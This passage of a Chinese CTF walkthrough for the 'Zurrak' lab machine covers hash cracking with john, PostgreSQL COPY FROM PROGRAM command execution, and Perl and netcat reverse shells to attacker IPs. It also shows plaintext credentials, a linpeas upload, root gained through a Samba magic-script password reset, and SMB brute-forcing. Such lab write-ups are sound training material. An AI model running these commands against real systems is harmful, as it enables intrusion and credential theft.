folder\\deploy\\3\\latest\\approved\\> cd ..\/\nsmb: \\operations\\New folder\\deploy\\3\\latest\\> cd declined\\\nsmb: \\operations\\New folder\\deploy\\3\\latest\\declined\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\3\\latest\\declined\\> exit<\/code><\/pre>\ncat operators.txt \nemir:Tlyu4#f\njohn:O0p12Az\nfreddie:KAsz241\nalbert:Lqak25r4\n\nplease change your credentials after reaching endpoint <\/code><\/pre>\n\u5c1d\u8bd5ssh\u767b\u5f55\uff0c\u4f46\u662f\u90fd\u5931\u8d25\u4e86\uff0c\u521b\u5efa\u865a\u62df\u673a\uff0c\u6211\u9009\u62e9\u4ee5\u63a5\u53d7\u5ea6\u6700\u5e7f\u7684vmware16.0<\/code>\u8fdb\u884c\u521b\u5efa\uff0c\u4f46\u662f\u62a5\u9519\u4e86\uff1a<\/p>\n<\/div><\/p>\n\u4fee\u6539\u4e3a17.0 \u6210\u529f\uff01<\/p>\n
<\/div><\/p>\n\u7a76\u6781\u5957\u5a03\uff01\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\nwhat\uff1f\u626b\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u5988\u5440\uff0c\u6211\u771f\u7684\u3002\u3002\u3002grub\u4e00\u4e0b\uff01<\/p>\n
<\/div>
\n<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u6587\u4ef6\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\nocr \u4e00\u4e0b\uff0c\u5c1d\u8bd5hash\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
postgres:$6$ZaTjsuy0$rBmhDDcT45A.p6chCl53MNn3c3k2lKjSn5sneyxOxaVpozADMVScztCYmdyexb4Gy7IvwlbBwzvRd.krKqT1L\/:19654:0:99999:7:::<\/code><\/pre>\n\n\u8fd9\u91cc\u641e\u9519\u597d\u591a\u6b21\u4e86\uff0c\u5efa\u8bae\u76f4\u63a5\u590d\u5236\u8fd9\u4e2a\u8282\u7701\u65f6\u95f4\u3002<\/p>\n<\/blockquote>\n
john shadow.txt --wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zurrak]\n\u2514\u2500$ john shadow.txt --wordlist=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nballer15 (postgres) \n1g 0:00:00:09 DONE (2024-04-07 05:02) 0.1106g\/s 3115p\/s 3115c\/s 3115C\/s chrisd..skate123\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\u627e\u5230\u5bc6\u7801\u4e86\uff01<\/p>\n
\u9664\u6b64\u4e4b\u5916\uff0c\u6211\u4eec\u53d1\u73b0\u91cc\u9762\u7684root\u4e5f\u6709hash\u5bc6\u7801\uff0c\u5c1d\u8bd5\u4e5f\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u6211\u5c31\u4e0d\u5c1d\u8bd5\u4e86\uff08\u5b9e\u9645\u4e0a\u5df2\u7ecf\u641e\u4e86\uff0c\u53d1\u73b0\u7206\u7834\u4e0d\u51fa\u6765\u4f30\u8ba1\u662f\u54ea\u4e2a\u5b57\u6bcd\u641e\u9519\u4e86\uff0c\u61d2\u5f97\u641e\u4e86\uff09<\/p>\n
POSTGRESQL\u8fde\u63a5<\/h3>\n
https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-postgresql<\/a><\/p>\npsql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection\npsql -h 172.20.10.3 -p 5432 -U postgres <\/code><\/pre>\n\u67e5\u8be2\u5185\u5bb9\uff0c\u4f46\u662f\u5b9e\u5728\u9ebb\u70e6\uff0c\u6211\u4e5f\u4e0d\u592a\u4f1a\u53ea\u80fd\u4e00\u4e2a\u4e00\u4e2a\u67e5\uff0c\u5c1d\u8bd5\u4f7f\u7528\u63d0\u4f9b\u7684poc\u5b9e\u73b0rce\uff01<\/p>\n
#PoC\nDROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM 'id';\nSELECT * FROM cmd_exec;\nDROP TABLE IF EXISTS cmd_exec;\n\n#Reverse shell\n#Notice that in order to scape a single quote you need to put 2 single quotes\nCOPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';<\/code><\/pre>\nCOPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"172.20.10.8:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';<\/code><\/pre>\n\u4f3c\u4e4e\u4e0d\u884c\uff0c\u6362\u4e00\u4e2a\uff1a<\/p>\n
DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM 'nc -e \/bin\/bash 172.20.10.8 1234';\nSELECT * FROM cmd_exec;<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) postgres@zurrak:\/$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/fusermount3\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) postgres@zurrak:\/$ find \/ -writable -type f 2>\/dev\/null\n\/var\/log\/postgresql\/postgresql-15-main.log.2.gz\n\/var\/log\/postgresql\/postgresql-15-main.log.1\n\/var\/log\/postgresql\/postgresql-15-main.log\n(remote) postgres@zurrak:\/$ cd \/home\n(remote) postgres@zurrak:\/home$ ls\npostgres\n(remote) postgres@zurrak:\/home$ cd postgres\/\n(remote) postgres@zurrak:\/home\/postgres$ ls\nemergency.sh user.txt\n(remote) postgres@zurrak:\/home\/postgres$ cat user.txt \nfe8f97f109ceb0362c95e60338c4c1a8\n(remote) postgres@zurrak:\/home\/postgres$ ls -la\ntotal 16\ndrwxr-xr-x 2 postgres postgres 4096 Oct 24 18:03 .\ndrwxr-xr-x 3 root root 4096 Oct 20 19:06 ..\n-rw------- 1 postgres postgres 28 Oct 24 16:47 emergency.sh\n-rw-r--r-- 1 postgres postgres 33 Oct 20 20:23 user.txt\n(remote) postgres@zurrak:\/home\/postgres$ cat emergency.sh \necho "root:1234" | chpasswd\n(remote) postgres@zurrak:\/home\/postgres$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n52 6 1 * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }\n#\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n(remote) postgres@zurrak:\/home\/postgres$ cat crontab -l\ncat: invalid option -- 'l'\nTry 'cat --help' for more information.\n(remote) postgres@zurrak:\/home\/postgres$ crontab -l\nno crontab for postgres\n(remote) postgres@zurrak:\/home\/postgres$ cd \/tmp\n(remote) postgres@zurrak:\/tmp$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/zurrak\n(local) pwncat$ lcd ..\n(local) pwncat$ upload linpeas.sh\n.\/linpeas.sh \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 860.5\/860.5 KB \u2022 ? \u2022 0:00:00[05:30:36] uploaded 860.55KiB in 0.84 seconds upload.py:76\n(local) pwncat$ \n(remote) postgres@zurrak:\/tmp$ chmod +x linpeas.sh \n(remote) postgres@zurrak:\/tmp$ .\/linpeas.sh <\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u53d1\u73b0\u4e86\u4f7f\u7528emergency.sh<\/code>\u7684\u5730\u65b9\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n(remote) postgres@zurrak:\/$ su emre\nPassword: \nsu: Authentication failure\n(remote) postgres@zurrak:\/$ vim \/etc\/samba\/smb.conf \nbash: vim: command not found\n(remote) postgres@zurrak:\/$ cat \/etc\/samba\/smb.conf \n......\n[ipc$]\nhosts allow = 127.0.0.1\nhosts deny = 0.0.0.0\/0\nguest ok = no\nbrowseable = no\n\n[share]\ncomment = "zurrak operations share"\npath = \/opt\/smbshare\nhosts allow = 0.0.0.0\/0\nguest ok = no\nbrowseable = yes\nwritable = no\nvalid users = emre, asli\n\n[internal]\ncomment = "zurrak internal share"\npath = \/opt\/internal\nhosts allow = 127.0.0.1\nguest ok = no\nbrowseable = yes\nwritable = yes\nvalid users = emre\ncreate mask = 0777\ndirectory mask = 0777\nforce user = root\nmagic script = emergency.sh<\/code><\/pre>\n\u53d1\u73b0\u4e00\u4e2a\u53ea\u53ef\u4ee5\u4ece\u5185\u90e8\u8fde\u63a5\u7684smb\u670d\u52a1\uff0c\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
(remote) postgres@zurrak:\/$ smbclient \\\\\\\\127.0.0.1\\\\internal -U emre\nPassword for [ZURRAK.HMV\\emre]:\nsession setup failed: NT_STATUS_LOGON_FAILURE\n(remote) postgres@zurrak:\/$ cd \/opt\/internal\n(remote) postgres@zurrak:\/opt\/internal$ ls -la\ntotal 8\ndrwxr-xr-x 2 shareuser root 4096 Oct 20 19:02 .\ndrwxr-xr-x 4 root root 4096 Oct 20 16:36 ..\n(remote) postgres@zurrak:\/opt\/internal$ smbclient \/\/127.0.0.1\/internal -U 'emre'\nPassword for [ZURRAK.HMV\\emre]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n . D 0 Fri Oct 20 19:02:55 2023\n .. D 0 Fri Oct 20 16:36:51 2023\n\n 9232860 blocks of size 1024. 6040656 blocks available\nsmb: \\> pwd\nCurrent directory is \\\\127.0.0.1\\internal\\\nsmb: \\> cd \/home\/postgres\/\ncd \\home\\postgres\\: NT_STATUS_OBJECT_PATH_NOT_FOUND\nsmb: \\> lcd \/home\/postgres\nsmb: \\> ls\n . D 0 Fri Oct 20 19:02:55 2023\n .. D 0 Fri Oct 20 16:36:51 2023\n\n 9232860 blocks of size 1024. 6040656 blocks available\nsmb: \\> ^C\n(remote) postgres@zurrak:\/opt\/internal$ cd \/home\/postgres\/\n(remote) postgres@zurrak:\/home\/postgres$ ls -la\ntotal 20\ndrwxr-xr-x 3 postgres postgres 4096 Apr 7 05:31 .\ndrwxr-xr-x 3 root root 4096 Oct 20 19:06 ..\n-rw------- 1 postgres postgres 28 Oct 24 16:47 emergency.sh\ndrwx------ 3 postgres postgres 4096 Apr 7 05:31 .gnupg\n-rw-r--r-- 1 postgres postgres 33 Oct 20 20:23 user.txt\n(remote) postgres@zurrak:\/home\/postgres$ cat emergency.sh \necho "root:1234" | chpasswd\n(remote) postgres@zurrak:\/home\/postgres$ smbclient \/\/127.0.0.1\/internal -U 'emre'\nPassword for [ZURRAK.HMV\\emre]:\nTry "help" to get a list of possible commands.\nsmb: \\> pwd\nCurrent directory is \\\\127.0.0.1\\internal\\\nsmb: \\> lcd \/home\/postgres\/\nsmb: \\> lpwd\nlpwd: command not found\nsmb: \\> pwd\nCurrent directory is \\\\127.0.0.1\\internal\\\nsmb: \\> put emergency.sh\nputting file emergency.sh as \\emergency.sh (0.4 kb\/s) (average 0.4 kb\/s)\nsmb: \\> ^C<\/code><\/pre>\n\u7b49\u5f85\u6267\u884c\uff0c\u7136\u540e\u5207\u6362\u7528\u6237\uff1a<\/p>\n
(remote) postgres@zurrak:\/home\/postgres$ su root\nPassword: # 1234\nroot@zurrak:\/home\/postgres# cd \/root\nroot@zurrak:~# ls -la\ntotal 24\ndrwx------ 4 root root 4096 Nov 14 04:12 .\ndrwxr-xr-x 18 root root 4096 Oct 20 15:22 ..\n-rw------- 1 root root 0 Nov 14 04:12 .bash_history\nlrwxrwxrwx 1 root root 9 Nov 14 04:12 bash_history -> \/dev\/null\n-rw------- 1 root root 20 Oct 24 13:56 .lesshst\ndrwxr-xr-x 3 root root 4096 Nov 14 04:59 .local\n-rw-r--r-- 1 root root 33 Oct 20 20:23 root.txt\ndrwx------ 2 root root 4096 Oct 20 15:21 .ssh\nroot@zurrak:~# cat root.txt \n66fce7650a88ac2afd99d061e1c6a4df<\/code><\/pre>\n\u989d\u5916\u6536\u83b7<\/h2>\n\u7206\u7834smb\u5bc6\u7801<\/h3>\n
\u5728\u770b\u7eff\u5e08\u5085\u7684wp<\/a>\u7684\u65f6\u5019\u53d1\u73b0\u4e86\u4e00\u79cd\u7206\u7834\u767b\u5f55\u7684\u65b9\u5f0f\uff1a<\/p>\ncrackmapexec smb 172.20.10.3 -u asli -p \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n<\/div><\/p>\n\u725b\u86d9\uff01\uff01\uff01\uff01\u8bb0\u4f4f\u4e86\uff01<\/p>\n
\u4f7f\u7528qemu\u6a21\u62df<\/h3>\n
\u770b\u4e00\u56fd\u5916\u5e08\u5085\u89e3\u6790<\/a>\u7684\u65f6\u5019\uff0c\u51fa\u73b0\u4e86\u4f7f\u7528qemu<\/code>\u6a21\u62df\u6267\u884c\uff0c\u800c\u4e0d\u7528vmware\u8fdb\u884c\u64cd\u4f5c\u7684\u65b9\u6cd5\uff0c\u5728\u8fd9\u91cc\u8bb0\u5f55\u4e00\u4e0b\uff1a<\/p>\nqemu-system-x86_64 -hda zurrak.old.vmdk -display gtk,show-cursor=on\n# cat (hd0,1)\/etc\/shadow\nunshadow passwd shadow > hashattack<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/kerszl.github.io\/hacking\/walkthrough\/Zurrak\/<\/a><\/p>\n
![\"image-20240407141735964\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800966.png\")
<\/div><\/p>\n![\"image-20240407142344912\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800967.png\")
<\/div><\/p>\n![\"image-20240407142436593\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800968.png\")
<\/div><\/p>\n![\"image-20240407143831763\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800969.png\")
<\/div><\/p>\n![\"image-20240407143940459\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800970.png\")
<\/div><\/p>\n![\"image-20240407144004986\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800971.png\")
<\/div><\/p>\n![\"image-20240407144140080\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800972.png\")
<\/div><\/p>\n![\"image-20240407145257365\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800973.png\")
<\/div><\/p>\n![\"image-20240407145428692\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800974.png\")
<\/div><\/p>\n![\"image-20240407145726033\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800975.png\")
<\/div><\/p>\n![\"image-20240407150438397\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800976.png\")
<\/div><\/p>\n![\"image-20240407151545260\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800977.png\")
<\/div><\/p>\n![\"image-20240407152047579\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800978.png\")
<\/div><\/p>\n![\"image-20240407155632600\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800979.png\")
<\/div><\/p>\n![\"image-20240407160955295\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800980.png\")
<\/div><\/p>\n![\"image-20240407161239192\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800981.png\")
<\/div><\/p>\n![\"image-20240407161609199\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800982.png\")
<\/div><\/p>\n![\"image-20240407162338184\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800983.png\")
<\/div><\/p>\n![\"image-20240407162424171\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800984.png\")
<\/div>![\"image-20240407162459382\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800985.png\")
<\/div><\/p>\n![\"image-20240407162933534\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800986.png\")
<\/div>![\"image-20240407162915177\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800987.png\")
<\/div><\/p>\n![\"image-20240407170521561\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800988.png\")
<\/div><\/p>\n![\"image-20240407172607479\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800989.png\")
<\/div><\/p>\n![\"image-20240407173304199\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800990.png\")
<\/div>![\"image-20240407173648829\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800991.png\")
<\/div><\/p>\n![\"image-20240407160421176\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800992.png\")
<\/div><\/p>\n